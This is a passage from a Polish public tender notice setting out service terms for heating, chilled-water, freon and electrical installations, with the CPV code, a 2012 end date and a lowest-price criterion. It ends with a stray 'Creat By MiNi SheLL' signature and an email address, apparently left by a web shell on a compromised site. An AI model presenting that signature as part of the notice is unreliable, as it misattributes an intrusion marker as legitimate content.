4.  Prace serwisowe należy prowadzić zgodnie z obowiązującymi normami, przepisami BHP i   Ppoż. oraz dokumentacją techniczno-ruchową producentów urządzeń wraz z serwisem  towarzyszących urządzeniom instalacji ciepła technologicznego, wody lodowej, instalacji freonowej, instalacji elektrycznej zasilania i sterowania.
5.  Każdorazowy przyjazd ekipy serwisowej należy potwierdzić w sekretariacie Biura Technicznego   pod numer telefonu 89/ 523-43-70, na co najmniej 2 (dwa) dni przed ustalonym terminem  przeglądu.
6. W przypadku zgłoszenia przez zamawiającego konieczności usunięcia awarii wymagającej      natychmiastowej naprawy, wykonawca zobowiązany jest do zgłoszenia się pod wskazany adres   w ciągu 1(jednej) godziny od otrzymania powiadomienia.
7. W przypadku konieczności usunięcia usterki lub dokonania naprawy - po zgłoszeniu tego faktu w     protokole serwisowym - wykonawca uzgodni z zamawiającym zakres, termin i koszty w trybie      odrębnej umowy. 
8. Wykonawca po wykonaniu każdej czynności serwisowej będzie sporządzał protokół, pod którym     powinien uzyskać podpis administratora danego obiektu lub inspektora nadzoru, potwierdzający  należyte jej wykonanie.
9. Wykonawca na własny koszt dostarczy niezbędne części i materiały do przeprowadzenia prac konserwacyjnych oraz udzieli na nie gwarancji na okres wyznaczony przez producenta.
10. Zamawiający zapewni dostęp do urządzeń objętych usługą w obiektach wymienionych w  niniejszym  załączniku oraz do źródeł wody i energii elektrycznej.
11. Podstawą do kwartalnego rozliczenia i wystawienia faktury będzie wartość kwartalna brutto podana przez wykonawcę w zamieszczonej poniżej tabeli, po należytym wykonaniu prac serwisowych i sporządzeniu protokołu serwisowego, potwierdzonego przez administratora danego obiektu lub inspektora nadzoru.
12. Pominięcie w przeglądzie i protokole, któregokolwiek z wymienionych w tabeli urządzeń lub  niesumienne wykonanie usługi w zakresie konkretnego urządzenia, może spowodować obniżenie miesięcznego wynagrodzenia o kwotę wynikającą z poniższej tabeli.
13. Zamawiający dopuszcza składania ofert  częściowych. Zamówienie zostało podzielone na 2 wyodrębnione części :.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com